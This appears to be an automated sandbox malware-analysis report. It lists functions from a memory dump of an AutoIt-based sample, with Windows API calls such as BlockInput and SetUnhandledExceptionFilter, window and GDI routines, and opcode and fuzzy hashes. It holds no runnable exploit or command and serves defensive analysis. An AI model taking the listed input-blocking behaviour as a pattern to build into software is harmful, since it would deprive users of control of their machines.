        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID: 0-3916222277
        • Opcode ID: c068e9f9115d249b132a151236c4cfb81729fc111e41a066ce2485b5b136c44c
        • Instruction ID: 8dcf82cba86a91b3797f9149fd72e7ecc3952e4bb788fcd7a4ddc137a7da3870
        • Opcode Fuzzy Hash: c068e9f9115d249b132a151236c4cfb81729fc111e41a066ce2485b5b136c44c
        • Instruction Fuzzy Hash: A8126EB19142299BCB14CF58C980AFEB7F5FF48710F15819AE949EB251EB309E91CF90
        APIs
        • BlockInput.USER32(00000001), ref: 0025EABD
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: BlockInput
        • String ID:
        • API String ID: 3456056419-0
        • Opcode ID: 1cd6599b57a1d550b152436f5da6ad9f241255298e3a271589a9936a2d5127e9
        • Instruction ID: 5493318d3a9175c4f9ada4f2b4878803fe4085c90bb3dfc39c7a82675ca66d30
        • Opcode Fuzzy Hash: 1cd6599b57a1d550b152436f5da6ad9f241255298e3a271589a9936a2d5127e9
        • Instruction Fuzzy Hash: BBE04F712102049FC710EF6AE844E9AF7EDBFA8760F01841AFD4AC7351DBB0E9458B90
        APIs
        • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,002003EE), ref: 002009DA
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ExceptionFilterUnhandled
        • String ID:
        • API String ID: 3192549508-0
        • Opcode ID: 715f3b5f37bc3f4ccf5a13b7e7ad7771aef90a7afb6e95db4f4bbf72a7f7eaf0
        • Instruction ID: 99300aa6af827ded96e027db54cf70dedf7058fbe2c4f54318db634035b66c73
        • Opcode Fuzzy Hash: 715f3b5f37bc3f4ccf5a13b7e7ad7771aef90a7afb6e95db4f4bbf72a7f7eaf0
        • Instruction Fuzzy Hash:
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID:
        • String ID: 0
        • API String ID: 0-4108050209
        • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
        • Instruction ID: d6e5f819e4226f9935835e5d1f30cc6303ca8209ff75bab75419f6ca69dff900
        • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
        • Instruction Fuzzy Hash: 9C516961E3C74B5BDB388D68885D7BF23999B42300F188519D882C72C3C661FE75E762
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID:
        • String ID: 0&+
        • API String ID: 0-3024635622
        • Opcode ID: 1d48b072b458ad574b97c86e23ddbc0fcbf2b86c89dba73831e1feb6a4e9155e
        • Instruction ID: 9a118a857a3a06c625b2a1a03070931a747465829c9fa9c3a8c4dea0054568bd
        • Opcode Fuzzy Hash: 1d48b072b458ad574b97c86e23ddbc0fcbf2b86c89dba73831e1feb6a4e9155e
        • Instruction Fuzzy Hash: 7F21A832621611CBDB28CE79C81267E73E5A764310F15862EE4A7C77D1DE35A908CB44
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 2b39734f14c6be3df49c479b44304252f253ad4d7a35e88d25aff2c926238e9d
        • Instruction ID: c6f794bc2789d975103d27a899bdda00a5ade5b8de5c4fa36db2cdcdf49fc927
        • Opcode Fuzzy Hash: 2b39734f14c6be3df49c479b44304252f253ad4d7a35e88d25aff2c926238e9d
        • Instruction Fuzzy Hash: C8322335D3AF018DD7239634D826336A699AFB73C5F15C737E81AB59A6EB29C4C34200
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 9f300da451992b99542907e3bbe60d0da4079c277394a72bfa33f3d3cc1dadcb
        • Instruction ID: c356d53be874be87ef73e2a45e8ab6bc1840d0a2be1453ed7b69cb0af17e4285
        • Opcode Fuzzy Hash: 9f300da451992b99542907e3bbe60d0da4079c277394a72bfa33f3d3cc1dadcb
        • Instruction Fuzzy Hash: D5326BB2A2415E8BCF28CF28C59467DB7A1EF45314F38852BD949EB291D730DDA1EB40
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: b612cce46df1aaea2bd157539114bc8bd3c8f74d6666fd83afd4b51671644619
        • Instruction ID: 351c7fe965e2621618184b66c6647f43f9911bddaaccf1c2d7dc8479d22e521e
        • Opcode Fuzzy Hash: b612cce46df1aaea2bd157539114bc8bd3c8f74d6666fd83afd4b51671644619
        • Instruction Fuzzy Hash: 9522E570A14A1AEFEF14CFA5D881AAEB3F5FF54300F148129E816E7291EB359D61CB50
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 9ec48340e326629bec242ce74d6ae0042f40b6098cc4e748c998ca188cbe52c8
        • Instruction ID: f9876962872e08a81edd2b0ee25c4a1598a5e356921b6e1a09ebc2b2f35ba5da
        • Opcode Fuzzy Hash: 9ec48340e326629bec242ce74d6ae0042f40b6098cc4e748c998ca188cbe52c8
        • Instruction Fuzzy Hash: 8C02F8B0E1051AFBDF04DF94D881AADB7B5FF54300F118169E916DB291EB719E21DB80
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
        • Instruction ID: b66eaa727699389156d62b819686353a3c456d4c5c7302774cedee61055a057a
        • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
        • Instruction Fuzzy Hash: 4D918A725282A34ADB2D4A3E857403EFFE15A923A131A079ED4F2CB1C7FE14D974D620
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
        • Instruction ID: ee811f259eaf41ebd842b19b6f88db270bfbaa26585fb568b1dd3568f0cbe551
        • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
        • Instruction Fuzzy Hash: 779165722292E34EDB2D4A7A857403EFFE15A923A531A079ED4F2CB1C2FE14D574D620
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: edfd845b4db257ec403ecf9dfd831cad4244c5ce6c4889a0281a109b7ff2072b
        • Instruction ID: b10a44ee874cd31bbae6200e561cce5ee65a37cbd2923e63fd0e811f179534b0
        • Opcode Fuzzy Hash: edfd845b4db257ec403ecf9dfd831cad4244c5ce6c4889a0281a109b7ff2072b
        • Instruction Fuzzy Hash: DC614861F3874B66EB345D288895BBF3394DF41708F10091AE882DB2C3DA91BE72C755
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 207ad3c5d84221c7009bf231d04418d9e3ddb1607dee0175769e8ab51e14d55f
        • Instruction ID: 8c870ce9cc5ece581700b7947ca5bf49aaaaf39a8f0e42e508c9c3bd69816410
        • Opcode Fuzzy Hash: 207ad3c5d84221c7009bf231d04418d9e3ddb1607dee0175769e8ab51e14d55f
        • Instruction Fuzzy Hash: 9A615B71E3870B67DB384E288895BBF2394AF42700F100959E982DB6C3EB52FD72C655
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
        • Instruction ID: 663d820b58a678f186be9961c9036eb81b454c93028b54b4952bd094991c11fd
        • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
        • Instruction Fuzzy Hash: 0E8198325281A34EEB2D4A79857443EFFE15A923A131A079DD4F2CB1D3EE24C674D620
        APIs
        • DeleteObject.GDI32(00000000), ref: 00262B30
        • DeleteObject.GDI32(00000000), ref: 00262B43
        • DestroyWindow.USER32 ref: 00262B52
        • GetDesktopWindow.USER32 ref: 00262B6D
        • GetWindowRect.USER32(00000000), ref: 00262B74
        • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00262CA3
        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00262CB1
        • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00262CF8
        • GetClientRect.USER32(00000000,?), ref: 00262D04
        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00262D40
        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00262D62
        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00262D75
        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00262D80
        • GlobalLock.KERNEL32(00000000), ref: 00262D89
        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00262D98
        • GlobalUnlock.KERNEL32(00000000), ref: 00262DA1
        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00262DA8
        • GlobalFree.KERNEL32(00000000), ref: 00262DB3
        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00262DC5
        • OleLoadPicture.OLEAUT32(?,00000000,00000000,0027FC38,00000000), ref: 00262DDB
        • GlobalFree.KERNEL32(00000000), ref: 00262DEB
        • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00262E11
        • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00262E30
        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00262E52
        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0026303F
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
        • String ID: $AutoIt v3$DISPLAY$static
        • API String ID: 2211948467-2373415609
        • Opcode ID: d4ecd57139288a69916aa6c8352bfde85cf8ef6c9c7caa0b9e605f0395828364
        • Instruction ID: 07840734cb572652ffd9b797c4735b38b60f2a34b5a74e1a52897f226bee18a7
        • Opcode Fuzzy Hash: d4ecd57139288a69916aa6c8352bfde85cf8ef6c9c7caa0b9e605f0395828364
        • Instruction Fuzzy Hash: 1C029C71910605EFDB14DF64EC8DEAE7BB9EF48310F148158F919AB2A1DB70AD84CB60
        APIs
        • SetTextColor.GDI32(?,00000000), ref: 0027712F
        • GetSysColorBrush.USER32(0000000F), ref: 00277160
        • GetSysColor.USER32(0000000F), ref: 0027716C
        • SetBkColor.GDI32(?,000000FF), ref: 00277186
        • SelectObject.GDI32(?,?), ref: 00277195
        • InflateRect.USER32(?,000000FF,000000FF), ref: 002771C0
        • GetSysColor.USER32(00000010), ref: 002771C8
        • CreateSolidBrush.GDI32(00000000), ref: 002771CF
        • FrameRect.USER32(?,?,00000000), ref: 002771DE
        • DeleteObject.GDI32(00000000), ref: 002771E5
        • InflateRect.USER32(?,000000FE,000000FE), ref: 00277230
        • FillRect.USER32(?,?,?), ref: 00277262
        • GetWindowLongW.USER32(?,000000F0), ref: 00277284
          • Part of subcall function 002773E8: GetSysColor.USER32(00000012), ref: 00277421
          • Part of subcall function 002773E8: SetTextColor.GDI32(?,?), ref: 00277425
          • Part of subcall function 002773E8: GetSysColorBrush.USER32(0000000F), ref: 0027743B
          • Part of subcall function 002773E8: GetSysColor.USER32(0000000F), ref: 00277446
          • Part of subcall function 002773E8: GetSysColor.USER32(00000011), ref: 00277463
          • Part of subcall function 002773E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00277471
          • Part of subcall function 002773E8: SelectObject.GDI32(?,00000000), ref: 00277482
          • Part of subcall function 002773E8: SetBkColor.GDI32(?,00000000), ref: 0027748B
          • Part of subcall function 002773E8: SelectObject.GDI32(?,?), ref: 00277498
          • Part of subcall function 002773E8: InflateRect.USER32(?,000000FF,000000FF), ref: 002774B7
          • Part of subcall function 002773E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002774CE
          • Part of subcall function 002773E8: GetWindowLongW.USER32(00000000,000000F0), ref: 002774DB
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
        • String ID:
        • API String ID: 4124339563-0
        • Opcode ID: 114c3fd19c7bccbce79261f99f0e5a495e30f2efcec1f949ee516420bdb6508f
        • Instruction ID: d81d310abcd9489c077dfe015a8c15e303af32b4d56363f9749500444f12aaec
        • Opcode Fuzzy Hash: 114c3fd19c7bccbce79261f99f0e5a495e30f2efcec1f949ee516420bdb6508f
        • Instruction Fuzzy Hash: 52A1A272018302AFD7109F70EC4CA5B7BA9FF49320F604A2DF96AA61E1D771E994CB51
        APIs
        • DestroyWindow.USER32(?,?), ref: 001F8E14
        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00236AC5
        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00236AFE
        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00236F43
          • Part of subcall function 001F8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,001F8BE8,?,00000000,?,?,?,?,001F8BBA,00000000,?), ref: 001F8FC5
        • SendMessageW.USER32(?,00001053), ref: 00236F7F
        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00236F96
        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00236FAC
        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00236FB7
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
        • String ID: 0
        • API String ID: 2760611726-4108050209
        • Opcode ID: d6242bde5bd85432ea8b16ea2ac08695edcaf1bc3baa005686e2efdac7dcd442
        • Instruction ID: 7f036285969400601c47bba5632e041b91829b2a83bd61cc9eeb3c694cbf09e2
        • Opcode Fuzzy Hash: d6242bde5bd85432ea8b16ea2ac08695edcaf1bc3baa005686e2efdac7dcd442
        • Instruction Fuzzy Hash: 8812DE70210646EFDB25CF24D89CBB5B7E9FB44300F548529E5899B662CB31ECA2CF91
        APIs
        • DestroyWindow.USER32(00000000), ref: 0026273E
        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0026286A
        • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 002628A9
        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 002628B9
        • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00262900
        • GetClientRect.USER32(00000000,?), ref: 0026290C
        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00262955
        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00262964
        • GetStockObject.GDI32(00000011), ref: 00262974
        • SelectObject.GDI32(00000000,00000000), ref: 00262978
        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00262988
        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00262991
        • DeleteDC.GDI32(00000000), ref: 0026299A
        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 002629C6
        • SendMessageW.USER32(00000030,00000000,00000001), ref: 002629DD
        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00262A1D
        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00262A31
        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00262A42
        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00262A77
        • GetStockObject.GDI32(00000011), ref: 00262A82
        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00262A8D
        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00262A97
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
        • API String ID: 2910397461-517079104
        • Opcode ID: b7bd14140c10ec6aaddf79b9d08c98483c356778f297cad41de44428f986f42c
        • Instruction ID: 38a28f9c58b7e27d659387f92281a712651c845839ce55acdb4c117d70c6acb4
